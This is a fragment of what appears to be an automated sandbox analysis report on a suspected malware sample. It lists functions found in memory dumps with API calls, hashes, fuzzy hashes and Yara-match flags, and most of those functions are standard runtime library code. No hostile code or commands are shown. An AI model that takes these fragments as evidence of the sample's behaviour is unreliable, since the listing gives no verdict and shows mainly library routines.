                                                                                                                                                                                                                                                                    • API ID: CurrentListProcess$AcquireConcurrency::details::_Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorDuplicateErrorException@8HandleLastLock::_ReaderSafeThrowWriteWriterstd::invalid_argument::invalid_argument
                                                                                                                                                                                                                                                                    • String ID: eventObject
                                                                                                                                                                                                                                                                    • API String ID: 1999291547-1680012138
                                                                                                                                                                                                                                                                    • Opcode ID: a400a672ae4bfdaa01994e5aaa8cdae1f15ced21a90c909c370a8ff226bbabcd
                                                                                                                                                                                                                                                                    • Instruction ID: 481122be4c91591a449bb5dcd4d0178f9edd258f0a599c8a0e64e7baae7edbbd
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a400a672ae4bfdaa01994e5aaa8cdae1f15ced21a90c909c370a8ff226bbabcd
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7A11A075500104EACB14EFA5CC49FEF77B8AF00701F24022BF519E21D1EB789A84C66D
                                                                                                                                                                                                                                                                    Function 024E0C26 Relevance: 15.1, APIs: 10, Instructions: 136threadCOMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 024E0C36
                                                                                                                                                                                                                                                                    • Concurrency::details::UMS::CreateUmsCompletionList.LIBCONCRT ref: 024E0C9D
                                                                                                                                                                                                                                                                    • Concurrency::details::InternalContextBase::ExecutedAssociatedChore.LIBCONCRT ref: 024E0CBA
                                                                                                                                                                                                                                                                    • Concurrency::details::InternalContextBase::WorkWasFound.LIBCONCRT ref: 024E0D20
                                                                                                                                                                                                                                                                    • Concurrency::details::InternalContextBase::ExecuteChoreInline.LIBCMT ref: 024E0D35
                                                                                                                                                                                                                                                                    • Concurrency::details::InternalContextBase::WaitForWork.LIBCONCRT ref: 024E0D47
                                                                                                                                                                                                                                                                    • Concurrency::details::InternalContextBase::SwitchTo.LIBCONCRT ref: 024E0D75
                                                                                                                                                                                                                                                                    • Concurrency::details::UMS::GetCurrentUmsThread.LIBCONCRT ref: 024E0D80
                                                                                                                                                                                                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 024E0DAC
                                                                                                                                                                                                                                                                    • Concurrency::details::WorkItem::TransferReferences.LIBCONCRT ref: 024E0DBC
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4623292394.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_24c0000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: Concurrency::details::$Base::ContextInternal$Work$ChoreCurrentThread$AssociatedCompletionCreateException@8ExecuteExecutedFoundInlineItem::ListReferencesSwitchThrowTransferWait
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 3720063390-0
                                                                                                                                                                                                                                                                    • Opcode ID: 771ecb464f7cbbc53463eb78e9650550d29affee346428328e6f851ddce87dca
                                                                                                                                                                                                                                                                    • Instruction ID: 068c6d76c028913e8500f7a1a7223212d1b0cd20cf8b446a062c3265e314c682
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 771ecb464f7cbbc53463eb78e9650550d29affee346428328e6f851ddce87dca
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A341B330A042049BEF19FFA6C564BED77A6AF01305F1450AFD8177B282CBB59A09CF61
                                                                                                                                                                                                                                                                    Function 00431DE6 Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00431DFA
                                                                                                                                                                                                                                                                      • Part of subcall function 0043346A: HeapFree.KERNEL32(00000000,00000000,?,0043A0F8,?,00000000,?,00000000,?,0043A39C,?,00000007,?,?,0043A790,?), ref: 00433480
                                                                                                                                                                                                                                                                      • Part of subcall function 0043346A: GetLastError.KERNEL32(?,?,0043A0F8,?,00000000,?,00000000,?,0043A39C,?,00000007,?,?,0043A790,?,?), ref: 00433492
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00431E06
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00431E11
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00431E1C
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00431E27
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00431E32
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00431E3D
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00431E48
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00431E53
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00431E61
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4622755016.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 776569668-0
                                                                                                                                                                                                                                                                    • Opcode ID: dff188c56af8bee3fd9e149c250172911bfba27409d3e3615d5ba8f14f079428
                                                                                                                                                                                                                                                                    • Instruction ID: 861173ad91a1010c78510ab484a24ed9c78665ad215b99cbbf48ba7f2ea438f1
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: dff188c56af8bee3fd9e149c250172911bfba27409d3e3615d5ba8f14f079428
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5811B9B6600508BFDB02EF5AC852CD93BA5EF18755F0190AAF9084F232D635DF559F84
                                                                                                                                                                                                                                                                    Function 024F204D Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 024F2061
                                                                                                                                                                                                                                                                      • Part of subcall function 024F36D1: HeapFree.KERNEL32(00000000,00000000,?,024FA35F,?,00000000,?,00000000,?,024FA603,?,00000007,?,?,024FA9F7,?), ref: 024F36E7
                                                                                                                                                                                                                                                                      • Part of subcall function 024F36D1: GetLastError.KERNEL32(?,?,024FA35F,?,00000000,?,00000000,?,024FA603,?,00000007,?,?,024FA9F7,?,?), ref: 024F36F9
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 024F206D
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 024F2078
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 024F2083
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 024F208E
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 024F2099
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 024F20A4
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 024F20AF
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 024F20BA
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 024F20C8
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4623292394.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_24c0000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 776569668-0
                                                                                                                                                                                                                                                                    • Opcode ID: dff188c56af8bee3fd9e149c250172911bfba27409d3e3615d5ba8f14f079428
                                                                                                                                                                                                                                                                    • Instruction ID: fef946d97ea5793219a416530691ae89fb4231b3207a572331b6c2269a2de75d
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: dff188c56af8bee3fd9e149c250172911bfba27409d3e3615d5ba8f14f079428
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DE117476600149AFDB91EF56C841CD93FA6EF44750B5140AABA098F221DB71EE609F90
                                                                                                                                                                                                                                                                    Function 0042E1B2 Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 200COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4622755016.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: __cftoe
                                                                                                                                                                                                                                                                    • String ID: F(@$F(@
                                                                                                                                                                                                                                                                    • API String ID: 4189289331-2038261262
                                                                                                                                                                                                                                                                    • Opcode ID: bbe416c8d69575f9d93ce627a81c40a4a4bf106591ac0e44be9dd0909605bb26
                                                                                                                                                                                                                                                                    • Instruction ID: f7128e803ecc638eadc91937d15ccb8599414b14ec088efe1e3a9152a03639fe
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: bbe416c8d69575f9d93ce627a81c40a4a4bf106591ac0e44be9dd0909605bb26
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 35511A32600215EBEB209F5BAC41FAF77A9EF49324F94425FF81592282DB39D900866D
                                                                                                                                                                                                                                                                    Function 0043EEA2 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 154COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,0044018F), ref: 0043EEC5
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4622755016.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: DecodePointer
                                                                                                                                                                                                                                                                    • String ID: acos$asin$exp$log$log10$pow$sqrt
                                                                                                                                                                                                                                                                    • API String ID: 3527080286-3064271455
                                                                                                                                                                                                                                                                    • Opcode ID: aa1c02400c42ddcfd268636a8d8394cc3decb473de125785aaadf9f4f02fbad0
                                                                                                                                                                                                                                                                    • Instruction ID: 8170d9845b751ca2959588a2f937d780391b5e174033125a046a2bd7c9c475e6
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: aa1c02400c42ddcfd268636a8d8394cc3decb473de125785aaadf9f4f02fbad0
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3351AF7090050EDBDF14DF99E6481ADBBB0FB4D300F2551A7E480A7295C77A8D29CB1E
                                                                                                                                                                                                                                                                    Function 024F3190 Relevance: 13.8, APIs: 9, Instructions: 300COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4623292394.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_24c0000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                    • Opcode ID: 2096f585af2949bbcbeb02ba378e27ab7de49007c7775bea8d51a9bce3371cac
                                                                                                                                                                                                                                                                    • Instruction ID: 53fe295e8d7c1c913dc3419ef71c61c93b0402730f2f3e856031721ee509452d
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2096f585af2949bbcbeb02ba378e27ab7de49007c7775bea8d51a9bce3371cac
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9CC1E270E04389AFDF52DFA9C840BAEBFB1AF89315F04419AE615AB391C7709941CF61
                                                                                                                                                                                                                                                                    Function 004286D0 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • _ValidateLocalCookies.LIBCMT ref: 004286FB
                                                                                                                                                                                                                                                                    • ___except_validate_context_record.LIBVCRUNTIME ref: 00428703
                                                                                                                                                                                                                                                                    • _ValidateLocalCookies.LIBCMT ref: 00428791
                                                                                                                                                                                                                                                                    • __IsNonwritableInCurrentImage.LIBCMT ref: 004287BC
                                                                                                                                                                                                                                                                    • _ValidateLocalCookies.LIBCMT ref: 00428811
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4622755016.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                                                                                                                                                                    • String ID: fB$csm
                                                                                                                                                                                                                                                                    • API String ID: 1170836740-1586063737
                                                                                                                                                                                                                                                                    • Opcode ID: be357bd56004c24e133951e3250c1e3ffc6610d741da1472be978505f667fff6
                                                                                                                                                                                                                                                                    • Instruction ID: 7444ce20eee9e01817f939fbe5b18052b9a848ec9e24e3aae95877e68e098c30
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: be357bd56004c24e133951e3250c1e3ffc6610d741da1472be978505f667fff6
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F241FB34F012289BCF10DF19DC41A9EBBB5AF84318F64816FE9145B392DB399D11CB99
                                                                                                                                                                                                                                                                    Function 00428CBD Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 87COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • FindSITargetTypeInstance.LIBVCRUNTIME ref: 00428D10
                                                                                                                                                                                                                                                                    • FindMITargetTypeInstance.LIBVCRUNTIME ref: 00428D29
                                                                                                                                                                                                                                                                    • FindVITargetTypeInstance.LIBVCRUNTIME ref: 00428D30
                                                                                                                                                                                                                                                                    • PMDtoOffset.LIBCMT ref: 00428D4F
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4622755016.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: FindInstanceTargetType$Offset
                                                                                                                                                                                                                                                                    • String ID: Bad dynamic_cast!
                                                                                                                                                                                                                                                                    • API String ID: 1467055271-2956939130
                                                                                                                                                                                                                                                                    • Opcode ID: 3d5976511a35a3e55709e8aa5dafb06ef667d3e4312e87b96652b8bae1ee5f2b
                                                                                                                                                                                                                                                                    • Instruction ID: 5e24beb8d8256b5c5f325d4796605ad5260749f939022e6450d69b98b3545f73
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3d5976511a35a3e55709e8aa5dafb06ef667d3e4312e87b96652b8bae1ee5f2b
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CD2137727062259FCB04DF65F902A6E77A4EF64714B60421FF900932C1DF3CE80586A9
                                                                                                                                                                                                                                                                    Function 024DC6C0 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 45COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • atomic_compare_exchange.LIBCONCRT ref: 024DC6DC
                                                                                                                                                                                                                                                                    • atomic_compare_exchange.LIBCONCRT ref: 024DC700
                                                                                                                                                                                                                                                                    • std::_Cnd_initX.LIBCPMT ref: 024DC711
                                                                                                                                                                                                                                                                    • std::_Cnd_initX.LIBCPMT ref: 024DC71F
                                                                                                                                                                                                                                                                      • Part of subcall function 024C1370: __Mtx_unlock.LIBCPMT ref: 024C1377
                                                                                                                                                                                                                                                                    • std::_Cnd_initX.LIBCPMT ref: 024DC72F
                                                                                                                                                                                                                                                                      • Part of subcall function 024DC3EF: __Cnd_broadcast.LIBCPMT ref: 024DC3F6
                                                                                                                                                                                                                                                                    • Concurrency::details::_RefCounter::_Release.LIBCONCRT ref: 024DC73D
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4623292394.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_24c0000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: Cnd_initstd::_$atomic_compare_exchange$Cnd_broadcastConcurrency::details::_Counter::_Mtx_unlockRelease
                                                                                                                                                                                                                                                                    • String ID: t#D
                                                                                                                                                                                                                                                                    • API String ID: 4258476935-1671555958
                                                                                                                                                                                                                                                                    • Opcode ID: e23295e8cd53ad3a663e09b033d10301f0236dd426b47c7b657df0c7463be66e
                                                                                                                                                                                                                                                                    • Instruction ID: 3d759f5225e069a456697f62c3be3bbee96de026bff47f4d4e7fd28e880ef105
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e23295e8cd53ad3a663e09b033d10301f0236dd426b47c7b657df0c7463be66e
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8101F775900605A7DB11BB65CDD5B9EB35ABF00314F24011BE81997780DBB8EA15CFD2
                                                                                                                                                                                                                                                                    Function 00432134 Relevance: 12.2, APIs: 8, Instructions: 216COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,0042D938,0042D938,?,?,?,00432385,00000001,00000001,23E85006), ref: 0043218E
                                                                                                                                                                                                                                                                    • __alloca_probe_16.LIBCMT ref: 004321C6
                                                                                                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00432385,00000001,00000001,23E85006,?,?,?), ref: 00432214
                                                                                                                                                                                                                                                                    • __alloca_probe_16.LIBCMT ref: 004322AB
                                                                                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,23E85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0043230E
                                                                                                                                                                                                                                                                    • __freea.LIBCMT ref: 0043231B
                                                                                                                                                                                                                                                                      • Part of subcall function 004336A7: RtlAllocateHeap.NTDLL(00000000,0040D870,00000000,?,0042679E,00000002,00000000,00000000,00000000,?,0040CD21,0040D870,00000004,00000000,00000000,00000000), ref: 004336D9
                                                                                                                                                                                                                                                                    • __freea.LIBCMT ref: 00432324
                                                                                                                                                                                                                                                                    • __freea.LIBCMT ref: 00432349
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4622755016.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 3864826663-0
                                                                                                                                                                                                                                                                    • Opcode ID: cf3b119e7e49bccc4fbc7953cec60797500e2f1b6a8bfe672ac464b3af2e48c8
                                                                                                                                                                                                                                                                    • Instruction ID: 93f6329b7fe105f45c70b5aed5e0df07748c8d3fe3b6be6f44c821e7de56536e
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: cf3b119e7e49bccc4fbc7953cec60797500e2f1b6a8bfe672ac464b3af2e48c8
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5851F472610216AFDB258F71CE41EAF77A9EB48B54F14522AFD04D7280DBBCDC40C698
                                                                                                                                                                                                                                                                    Function 024F1129 Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 266COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                      • Part of subcall function 024F2141: GetLastError.KERNEL32(?,?,024EA9EC,?,00000000,?,024ECDE6,024C247E,00000000,?,00451F20), ref: 024F2145
                                                                                                                                                                                                                                                                      • Part of subcall function 024F2141: _free.LIBCMT ref: 024F2178
                                                                                                                                                                                                                                                                      • Part of subcall function 024F2141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 024F21B9
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 024F1444
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 024F145D
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 024F148F
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 024F1498
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 024F14A4
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4623292394.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_24c0000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: _free$ErrorLast
                                                                                                                                                                                                                                                                    • String ID: C
                                                                                                                                                                                                                                                                    • API String ID: 3291180501-1037565863
                                                                                                                                                                                                                                                                    • Opcode ID: eed3b7bc2709ca3cbefa9e0eb2039d909a82c3add560d3625423817520cd7e58
                                                                                                                                                                                                                                                                    • Instruction ID: 6a463bac80b8cea68074eaabba28607f2c70697511ba6ab4a69f72bd26ec6326
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: eed3b7bc2709ca3cbefa9e0eb2039d909a82c3add560d3625423817520cd7e58
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 29B12775A0121ADBDB64DF18C984BAEB7B5FB88314F1045AEDA0DA7350D770AE90CF40
                                                                                                                                                                                                                                                                    Function 00439EAE Relevance: 10.7, APIs: 7, Instructions: 204COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4622755016.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: _free
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 269201875-0
                                                                                                                                                                                                                                                                    • Opcode ID: 1c3dc1b9d9b3fad286da187fe857a54df99b30e252b8950e3012847a3cb02415
                                                                                                                                                                                                                                                                    • Instruction ID: bfd9ead29151d2877f631d1061df4e601ee651aa38b3335c59b440bd117a4214
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1c3dc1b9d9b3fad286da187fe857a54df99b30e252b8950e3012847a3cb02415
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9361F171900205AFDB20DF69C842B9EBBF4EB08710F14516BE884EB382E7399D41CB59
                                                                                                                                                                                                                                                                    Function 024FA115 Relevance: 10.7, APIs: 7, Instructions: 204COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4623292394.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_24c0000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: _free
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 269201875-0
                                                                                                                                                                                                                                                                    • Opcode ID: 30d23d355d895f70cd8acfb134f092bcee01e0337bd1769fb6490f5a84f9f64a
                                                                                                                                                                                                                                                                    • Instruction ID: b5a4c6b52f6f898d8f653f2790c7ca7625b2d9d3b143d184c2ffadd173a26ac3
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 30d23d355d895f70cd8acfb134f092bcee01e0337bd1769fb6490f5a84f9f64a
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A061F271A00215AFDBA0CF69C841B9ABBF5EF84710F2541ABEA58EB341D771A941CB50
                                                                                                                                                                                                                                                                    Function 00433883 Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • GetConsoleCP.KERNEL32(?,0042C23D,E0830C40,?,?,?,?,?,?,00433FF8,0040DDD5,0042C23D,?,0042C23D,0042C23D,0040DDD5), ref: 004338C5
                                                                                                                                                                                                                                                                    • __fassign.LIBCMT ref: 00433940
                                                                                                                                                                                                                                                                    • __fassign.LIBCMT ref: 0043395B
                                                                                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(?,00000000,0042C23D,00000001,?,00000005,00000000,00000000), ref: 00433981
                                                                                                                                                                                                                                                                    • WriteFile.KERNEL32(?,?,00000000,00433FF8,00000000,?,?,?,?,?,?,?,?,?,00433FF8,0040DDD5), ref: 004339A0
                                                                                                                                                                                                                                                                    • WriteFile.KERNEL32(?,0040DDD5,00000001,00433FF8,00000000,?,?,?,?,?,?,?,?,?,00433FF8,0040DDD5), ref: 004339D9
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4622755016.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 1324828854-0
                                                                                                                                                                                                                                                                    • Opcode ID: 701a8cb139ac8c875ca722d2ea664996543124ca91dde6e2e1173c132f03efc9
                                                                                                                                                                                                                                                                    • Instruction ID: 0964c92a74c3400c6cb4ab9b4b67413798647f05f85f7adc4f4dadb846cf7038
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 701a8cb139ac8c875ca722d2ea664996543124ca91dde6e2e1173c132f03efc9
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3451C271E00209AFDB10DFA8D885BEEBBF4EF09301F14412BE556E7291E7749A41CB69
                                                                                                                                                                                                                                                                    Function 024F3AEA Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
